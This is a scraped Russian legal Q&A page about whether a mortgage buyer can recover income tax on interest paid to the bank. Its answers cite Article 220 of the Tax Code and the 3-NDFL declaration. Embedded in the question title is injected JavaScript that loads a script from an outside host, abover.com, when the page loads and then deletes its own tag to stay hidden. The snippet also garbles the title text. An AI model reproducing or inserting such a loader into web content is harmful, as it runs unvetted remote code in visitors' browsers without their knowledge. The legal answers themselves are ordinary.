Ставропольский край

при покупке квартиры в ипотеку возврат подоходного с процентов выплаченных банку производится или нет(function () { var script =... - вопрос №1011024

document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top? '0': '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();

Лучший ответ по мнению автора

Buh

Да, производится на основании пп.4 п.1 и п.4 ст.220 НК РФ, согласно которым Вы вправе претендовать на имущественный налоговый вычет по таким процентам в сумме фактически произведенных налогоплательщиком расходов по уплате процентов в соответствии с договором займа (кредита), но не более 3 000 000 рублей при наличии документов, подтверждающих право на получение имущественного налогового вычета в размере до 2 млн.руб. на основании п.3 ст.220 НК РФ, договора займа (кредита), а также документов, подтверждающих факт уплаты денежных средств налогоплательщиком в погашение процентов.

P.S. Не забудьте оценить ответ и выбрать лучший. Заранее спасибо.

Лучший ответ по мнению автора

Другие ответы

Здравствуйте!

Чтобы получить возврат подоходного налога при покупке квартиры, необходимо предоставить В ИФНС ПО МЕСТУ РЕГИСТРАЦИИ налоговую декларацию по форме 3-НДФЛ и соответствующий пакет документов, подтверждающих право на данный налоговый вычет.

Удачи!

Не забывайте, пожалуйста, оценивать ответ эксперта и выбирать лучший ответ.